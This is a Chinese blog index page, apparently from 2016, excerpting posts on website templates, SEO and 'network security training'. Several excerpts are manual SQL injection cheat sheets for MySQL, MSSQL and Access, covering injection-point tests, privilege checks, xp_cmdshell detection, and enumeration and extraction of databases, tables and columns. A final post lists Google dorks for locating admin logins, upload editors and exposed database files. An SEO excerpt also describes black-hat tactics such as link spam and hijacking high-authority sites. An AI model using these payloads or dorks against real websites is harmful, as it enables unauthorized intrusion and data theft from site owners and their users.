• 置顶文章
  • 最新文章
  • 热门文章
  • 随机文章

淘宝天猫店铺设计_品牌策划设计类织梦dedecms网站模板 热门文章

时间:2016-2-26   作者:sunghost   分类: 网站模板下载   浏览:985   编辑   评论:3
时间:2016-2-26   分类: 网站模板下载    浏览:985  
设计类_淘宝天猫店铺设计_品牌策划设计类网站模板首页.jpg

阅读全文>>

法律行业_个人律师_律师网站模板织梦dedecms网站模板 热门文章

时间:2016-2-26   作者:sunghost   分类: 网站模板下载   浏览:1808   编辑   评论:16
时间:2016-2-26   分类: 网站模板下载    浏览:1808  
网站模板.jpg

阅读全文>>

政府协会_慈善机构组织_社会义工协会网络模板 热门文章

时间:2016-2-26   作者:sunghost   分类: 网站模板下载   浏览:2062   编辑   评论:21
时间:2016-2-26   分类: 网站模板下载    浏览:2062  

织梦内核后台操作简单方便,适合政府协会_慈善机构组织_社会义工协会行业,符合SEO优化标准。

政府协会_慈善机构组织_社会义工协会网络模板栏目列表页.jpg

阅读全文>>

广告传媒公司_明星经纪人公司_模特经纪人公司织梦DEDECMS网站模板 热门文章

时间:2016-2-26   作者:sunghost   分类: 网站模板下载   浏览:826   编辑   评论:4
时间:2016-2-26   分类: 网站模板下载    浏览:826  

通用网站模板适合SEO优化,网站页面布局合理,带数据。

广告传媒公司_明星经纪人公司织梦DEDECMS网站模板

阅读全文>>

早期网站入侵渗透教程【上科互联搜集】 热门文章

时间:2016-2-18   作者:sunghost   分类: 网络安全培训   浏览:2070   编辑   评论:25
时间:2016-2-18   分类: 网络安全培训    浏览:2070  

网站入侵渗透免费教程.jpg

早期网站入侵渗透教程【上科互联搜集】下载地址:

阅读全文>>

PHP网站MySQL手工注入教程 热门文章

时间:2016-2-17   作者:sunghost   分类: 网络安全培训   浏览:2651   编辑   评论:10
时间:2016-2-17   分类: 网络安全培训    浏览:2651  
Mysql注入
1、判断注入点:
and 1=1
and 1=2
or 1=1
2、判断字段长度
order by 11
3、报错
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from information_schema.tables
4、报基本信息
database()//数据库名

阅读全文>>

网站SEO优化人员必读干货 热门文章

时间:2016-2-17   作者:sunghost   分类: SEO优化培训   浏览:1938   编辑   评论:0
时间:2016-2-17   分类: SEO优化培训    浏览:1938  
第八章 SEO作弊及惩罚
1、作弊或对搜索引擎不友好手段
常用方式:
1、关键词堆砌:标题、标签、图片ALT文字、正文、页脚、评论、列表等。程度比较模糊,有轻度、重度、极端及无关堆砌。
2、垃圾链接(论坛签名、纯锚文本、锚文本与内容主题不符、群发软件),搜索引擎过滤效果为零
3、买卖链接 判断:主题是否相关、是否大量单向、位置
3、站群 几十几百个 配合采集伪原创工具、链接群发等等(医疗站常用)
4、诱饵替换 以获得正规排名页面替换或增加商业或******非法词 以获得搜索引擎短暂排名(******站常用)
5、利用或劫持高权重网站 百度自身产品 其他博客论坛 政府学校域名网站 注意是否带有nofollow(******站常用)
6、链接向惩罚网站
隐藏文字、桥页等其他方式现在连******/医疗等类站点都已不常用。
2、搜索引擎惩罚

阅读全文>>

Mssql手工注入教程 热门文章

时间:2016-2-16   作者:sunghost   分类: 网络安全培训   浏览:2150   编辑   评论:13
时间:2016-2-16   分类: 网络安全培训    浏览:2150  
mssql端口1433
1、判断是否有注入
and 1=1
and 1=2
2、初步判断是否是mssql
and user>0
and exists (select * from sysobjects) //判断是否是MSSQL
3、判断数据库系统
and (select count(*) from sysobjects)>0 mssql
and (select count(*) from msysobjects)>0 access
and 1=(select @@version) 报版本信息
and 1=(select @@VERSION) //MSSQL版本
and 1=(select db_name()) 报数据库名
and 1=(select @@servername) //本地服务名
4、猜解表名
and (select count(*) from [表名])>0
and exists(select * from [表名]) //猜解表名
5、猜解字段名
and (select count([字段名]) from [表名])>0
6、测试权限结构
and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- //判断是否是系统管理员
and 1=(select IS_SRVROLEMEMBER('db_owner'));-- //判断是否是库权限
and 1=(select IS_SRVROLEMEMBER('pulic'));-- //判断是否是public权限
and 1=(Select IS_MEMBER('db_owner'));-- //判断是否是库权限
and 1= (Select HAS_DBACCESS('master'));-- //判断是否有库读取权限
and 1=convert(int,db_name())或1=(select db_name()) //当前数据库名
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....
;declare @d int //是否支持多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
7、获取用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4) 获取第一个用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'数据库名') //获取第二个用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'数据库名' and name<>'数据库名') //获取第三个用户数据库
8、获取表名
and 1=(select top 1 name from sysobjects where xtype='u')//获取第一张表
and 1=(select top 1 name from sysobjects where xtype='U' and name <> '[表名]')//获取第二张表
9、获取列名
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'user'))//获取user表的列名
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'user')) and name <> 'uname' //获取user表的列名
10、获取表数据
and 1=(select top 1 [列名] from [表名])

阅读全文>>

ASP网站access手工注入流程及代码 热门文章

时间:2016-2-16   作者:sunghost   分类: 网络安全培训   浏览:4210   编辑   评论:14
时间:2016-2-16   分类: 网络安全培训    浏览:4210  
一、判断注入点
1.’
2.and 1=1
3.and 1=2
4.or 1=1 
5.or 1=2
6.and 1=23

二、判断使用的数据库类型
判断一下当前Web用的是什么数据库,这可以从Access和Mssql 的区别入手。Access和Mssql都有自己的系统表,比如存放数据库中所有对象的表,Access是在系统表[msysobjects]中,但在Web环境下读取该表会提示“没有权限”,Mssql是在表[sysobjects]中,在Web环境下则可正常读取。
and (select count(*) from msysobjects)>0 access
and exists (select * from msysobjects)>0 access
and (select count(*) from sysobjects)>0 sqlserver
and exists(select * from sysobjects)>0 sqlserver


三、判断数据库中的表
and exists (select * from admin)

阅读全文>>

今天你对我爱搭不理,明天我让你高攀不起 热门文章

时间:2016-2-4   作者:sunghost   分类: 上科营销思维   浏览:1149   编辑   评论:0
时间:2016-2-4   分类: 上科营销思维    浏览:1149  

今天你对我爱搭不理,明天我让你高攀不起

“15年前来美国要2百万,被30家VC拒了。我今天又来了,要2百亿”。-------马云

互联网圈总是充满着太多的不确定性,也拥有太多的传奇故事。下面就为大家举几个例子:
1.2009年,WhatsApp联合创始人Brian Acton去Facebook 应聘遭拒,现在,Facebook花了190亿美金收购WhatsApp;
2.当初马云与优酷创始人古永锵竞争搜狐COO职位,古永锵战胜马云,现在,马云的阿里巴巴入股了古永锵的优酷土豆;
3.当初马化腾曾考虑以60万元将QQ出售,先后和四家公司谈判,都终以失败告终,如今,马化腾以的身价只能让大家呵呵了;
4.另外一个故事是,QQ做得稍大以后,马化腾还找过新浪的创始人王志东,问150万美元要不要,王志东看了一眼心想你那东西我花10万就做出来了。因此拒绝购买。

阅读全文>>

网站渗透入侵常见谷歌黑客语法总结【sunghost】 热门文章

时间:2016-2-4   作者:sunghost   分类: 网络安全培训   浏览:11571   编辑   评论:6
时间:2016-2-4   分类: 网络安全培训    浏览:11571  

黑客常用的语法


admin site:edu.cn
site:sunghsot.cn intext:管理|后台|登录|用户名|密码|验证码|系统|账号|后台管理|后台登录
site:sunghsot.cn intitle:管理|后台|登录|用户名|密码|验证码|系统|账号|后台管理|后台登录
inurl:login/admin/manage/admin_login/login_admin/system/boos/master/main/cms/wp-admin/sys|managetem|password|username
site:www.sunghost.cn inurl:file
site:www.sunghost.cn inurl:load
site:www.sunghost.cn inurl:php?id=
site:www.sunghost.cn inurl:asp?id=
site:www.sunghost.cn inurl:fck
site:www.sunghost.cn inurl:ewebeditor
inurl:ewebeditor|editor|uploadfile|eweb|edit
intext:to parent directory
intext:转到父目录/转到父路径
inurl:upload.asp
inurl:cms/data/templates/images/index/
intitle:powered by dedecms
index of/ppt
Filetype:mdb
site:www.sunghost.cn intext:to parent directory+intext.mdb
inurl:robots.txt
site:sunghost.cn filetype:mdb|ini|php|asp|jsp
其他相关指令:related,cache,info,define,link,allinanchor等。

阅读全文>>